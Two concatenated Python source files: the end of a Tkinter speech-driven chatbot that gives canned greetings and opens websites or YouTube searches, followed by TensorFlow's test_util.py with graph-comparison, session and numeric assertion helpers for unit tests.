Button(self.frame1b, text='OK', bg='blue', fg='white', font='Raleway', padx=10, command=lambda: self.buttonCmd(6)).pack(side=LEFT, pady=30)
Button(self.frame1b, text='Back', bg='red', fg='white', font='Raleway', command=lambda: self.buttonCmd(5)).pack(side=LEFT, padx=20)
else:
self.frame1a.destroy()
self.frame1b.destroy()
def compress(self, text):
if len(text) >= 37:
textLimit = 0
textList = []
textSplit = text.split(' ')
for word in textSplit:
textLimit += len(word)
textList.append(word+' ')
if textLimit >= 37:
textList.append('\n')
textLimit = 0
textList[-2] = textList[-2].rstrip(' ')  # drop the trailing space before the inserted line break
text = ''.join(textList)
textList.clear()
return text
def myMsg(self, text):
if text != '':
msg = self.compress(text)
label = Label(self.frame0a, text= msg, font='Arial', fg='blue', bg='white', justify=LEFT)
self.msgLimit.append(label)
self.showMsg(E)
def comMsg(self, text):
msg = self.compress(text)
label = Label(self.frame0a, text= msg, font='Arial', fg='red', bg='white', justify=LEFT)
self.msgLimit.append(label)
self.showMsg(W)
def showMsg(self, anchor):
if len(self.msgLimit) >= 8:
self.msgLimit[0].destroy()
self.msgLimit.pop(0)
return self.msgLimit[-1].pack(anchor=anchor)
def suggestion(self):
if self.dt == '0-1':
lst = ['I\'m fine', 'I\'m good, how about you?', 'I\'m fine, and you?']
lst += randchoice(['hi', 'what is your name?', 'what can you do?', f'good {timeBG()}'], 2)
elif self.dt == '0-2':
lst = [decrypt(skill, encryptKey[0]) for skill in open(f'{self.cwd}\\data\\skill.library', 'r').read().split('-')]
lst += ['what can you do?', 'what else you can do?', 'what you can do?']
else:
lst = ['hello','how are you?', 'hi', 'what is your name?', 'what can you do?', f'good {timeBG()}', self.name, 'hello, how are you?']
return randchoice(lst, 3)
def change_suggestion(self):
self.text1, self.text2, self.text3 = self.suggestion()
self.button0a['text'] = self.text1
self.button0b['text'] = self.text2
self.button0c['text'] = self.text3
def say(self, text, waitTime=0):
if text == None:
return
sleep(waitTime)
engine.say(text)
self.comMsg(text)
self.change_suggestion()
try:
engine.runAndWait()
except:
pass
def hear(self, timeout= None):
r = sr.Recognizer()
m = sr.Microphone()
with m as source:
r.adjust_for_ambient_noise(source, duration=1)
with sr.Microphone() as source:
print('listening...')
try:
try:
playsound(f'{self.cwd}\\audio\\listening.wav')
except:
pass
src = r.listen(source, phrase_time_limit=6, timeout=timeout)
word = r.recognize_google(src, language='en-US')
self.myMsg(word)
self.process(word)
except sr.RequestError:
word = None
except sr.UnknownValueError:
word = None
except sr.WaitTimeoutError:
word = None
finally:
self.microphone['image'] = self.microphoneImg
self.microphone['state'] = NORMAL
self.keyboard['state'] = NORMAL
self.setting['state'] = NORMAL
def process(self, word):
if word == None:
return
word = word.lower()
try:
self.me
except:
self.notrun()
def offer_help_again():
offer_help = ['is there anything I can help again?', 'is there anything else I can help you with?', None, None, None, None]
response = choice(offer_help)
Thread(target=self.say, args=(response,)).start()
skills = [decrypt(skill, encryptKey[0]) for skill in open(f'{self.cwd}\\data\\skill.library', 'r').read().split('-')]
askskills = ['what can you do', 'what do you can', 'what you can do', 'what else you can do?']
response_askskills = ['try saying @skill1 or @skill2', 'you can try by saying @skill1 or @skill2']
for askskill in askskills:
if askskill in word and len(skills) >= 2:
self.dt = '0-2'
skill1, skill2 = randchoice(skills, 2)
response = choice(response_askskills).replace('@skill1', f'\"{skill1}\"').replace('@skill2', f'\"{skill2}\"')
Thread(target=self.say, args=(response,)).start()
return
name = self.name
asknames = ['what is your name', 'who are you', "tell me your name"]
response_asknames = [f'you can call me {name}', f'hello, my name is {name}. I am an Artificial Assistant', f'hi, my name is {name}. I am an Artificial Assistant', f'my name is {name}. I am an Artificial Assistant',
f'hello, my name is {name}', f'hi, my name is {name}', f'my name is {name}']
for askname in asknames:
if askname in word:
self.dt = ''
response = choice(response_asknames)
Thread(target=self.say, args=(response,)).start()
return
askhays = ['how are you']
response_askhaysa = ['I\'m great, how about you sir?', 'I\'m fine, and you?', 'I\'m good, how about you?', 'I\'m fine, how about you?', 'I\'m good, and you?']
response_askhaysb = ['I\'m fine, is there anything I can help you with?', 'I\'m fine, what can I do for you?', 'I\'m good, what can I do for you?', 'I\'m good, is there anything I can help you with?']
for askhay in askhays:
if askhay in word:
self.dt = '0'
response = choice(response_askhaysa+response_askhaysb)
for dt_askhaysa in response_askhaysa:
if response == dt_askhaysa:
self.dt += '-1'
break
for dt_askhaysb in response_askhaysb:
if response == dt_askhaysb:
self.dt += '-2'
break
Thread(target=self.say, args=(response,)).start()
return
greetings1 = ["hello", "hi", "hey", "halo", 'helo']
responses_gts1a = ["hello sir, how are you?", "hi, how are you today?", "hi, how are you today?", "hello sir, how are you?"]
responses_gts1b = ["hello sir, how can I help you?", "hello sir, what can I do for you?", "hi, what can I do for you sir?", "hi, what can I do for you?", "hello, is there anything I can help you with?", "hi, is there anything I can help you with?", "hello sir, what\'s up?"]
for greeting1 in greetings1:
if word.startswith(greeting1):
self.dt = '0'
response = choice(responses_gts1a+responses_gts1b)
for dt_gts1a in responses_gts1a:
if response == dt_gts1a:
self.dt += '-1'
break
for dt_gts1b in responses_gts1b:
if response == dt_gts1b:
self.dt += '-2'
break
Thread(target=self.say, args=(response,)).start()
return
greetings2 = ["morning", "afternoon", "evening"]
responses_gts2a = [f"good {timeBG()}, how are you today?", f"good {timeBG()}, how are you today?", f"good {timeBG()}, how are you today?", f"good {timeBG()}, how are you?"]
responses_gts2b = [f"good {timeBG()} sir, how can I help you?", f"good {timeBG()}, what can I do for you?", f"{timeBG()}, is there anything I can help you with?"]
for greeting2 in greetings2:
if greeting2 in word:
if word.startswith('good') or greeting2 == word:
self.dt = '0'
if greeting2 == timeBG():
response = choice(responses_gts2a+responses_gts2b)
for dt_gts2a in responses_gts2a:
if response == dt_gts2a:
self.dt += '-1'
break
for dt_gts2b in responses_gts2b:
if response == dt_gts2b:
self.dt += '-2'
break
else:
response = choice([f"looks like it\'s {timeBG()} sir", f"I think it's {timeBG()} sir"])
Thread(target=self.say, args=(response,)).start()
return
webs = {
'amazon': 'https://www.amazon.com',
'facebook': 'https://www.facebook.com',
'drive': 'https://drive.google.com',
'gmail': 'https://mail.google.com',
'google drive': 'https://drive.google.com',
'google': 'https://www.google.com',
'instagram': 'https://www.instagram.com',
'paypal': 'https://www.paypal.com',
'savefrom': 'https://en.savefrom.net/20',
'shareit': 'https://pc.ushareit.com',
'twitter': 'https://twitter.com',
'whatsapp': 'https://web.whatsapp.com',
'youtube': 'https://www.youtube.com',
}
openwebs = ['open']
response_openwebs = ['okay, open @web', 'okay']
for openweb in openwebs:
for web, link in webs.items():
if f'{openweb} {web}' in word:
self.dt = '0-2'
response = choice(response_openwebs).replace('@web', web)
if 'can you' in word:
var = choice(['okay', 'sure', 'of course'])
response = response.replace('okay', var)
Thread(target=self.say, args=(response,)).start()
Thread(target=wb.open, args=(link,)).start()
offer_help_again()
return
def playyt(topic, open_video= True):
url = f"https://www.youtube.com/results?q={topic}"
count = 0
cont = requests.get(url)
data = cont.content
data = str(data)
lst = data.split('"')
for i in lst:
count += 1
if i == "WEB_PAGE_TYPE_WATCH":
break
if open_video:
wb.open(f"https://www.youtube.com{lst[count - 5]}")
responses_yt = ['okay, open youtube and show the result', 'okay, show the result']
if word.startswith('youtube ') or word.endswith(' in youtube') or word.endswith(' on youtube'):
self.dt = '0-2'
word = word.replace('youtube ','').replace(' in youtube', '').replace(' on youtube', '')
response = choice(responses_yt)
Thread(target=self.say, args=(response,)).start()
Thread(target=playyt, args=(word,)).start()
offer_help_again()
return
greetings1dt0 = ["i'm good", "i am good", "i'm fine", "i am fine", "i'm great", "i am great"]
responses_gts1dt0 = ["glad to hear that, is there anything I can help you with?", "glad to hear that, how can I help you?"]
if self.dt == '0-1':
for greeting1dt0 in greetings1dt0:
if word.startswith(greeting1dt0):
self.dt = '0-2'
if 'how about you' in word or 'and you' in word:
response = choice(response_askhaysb)
else:
response = choice(responses_gts1dt0)
Thread(target=self.say, args=(response,)).start()
return
if name.lower() in word:
self.dt = '0-2'
response = choice([choice(responses_gts1b), responses_gts1b[-1]])
Thread(target=self.say, args=(response,)).start()
return
if __name__ == '__main__':
app = UI()
app.mainloop()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return x.name
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
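# Illustrative sketch: the shape-array path of the two converters above. A
# batch of one 224x224 RGB image in NHWC order maps to NCHW and back (the
# concrete shape is only an example).
def _example_shape_conversion():
  nhwc_shape = [1, 224, 224, 3]        # [batch, height, width, channels]
  nchw_shape = NHWCToNCHW(nhwc_shape)  # -> [1, 3, 224, 224]
  assert NCHWToNHWC(nchw_shape) == nhwc_shape
  return nchw_shape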
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
# pylint: disable=protected-access
def disable_c_api_wrapper(*args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = False
try:
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
return disable_c_api_wrapper
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
ops.reset_default_graph()
ops.get_default_graph().seed = random_seed.DEFAULT_GRAPH_SEED
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another proto of the same type as message, reads the ascii message into it, and
then compares them using self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
config = new_config
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/gpu:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/gpu:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/gpu:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/gpu:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
self.assertTrue(
math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(b, a, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts.
Args:
a: The expected numpy ndarray (or anything that can be converted to one), or
dict of same. Must be a dict iff `b` is a dict.
b: The actual numpy ndarray (or anything that can be converted to one), or
dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(b, a)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
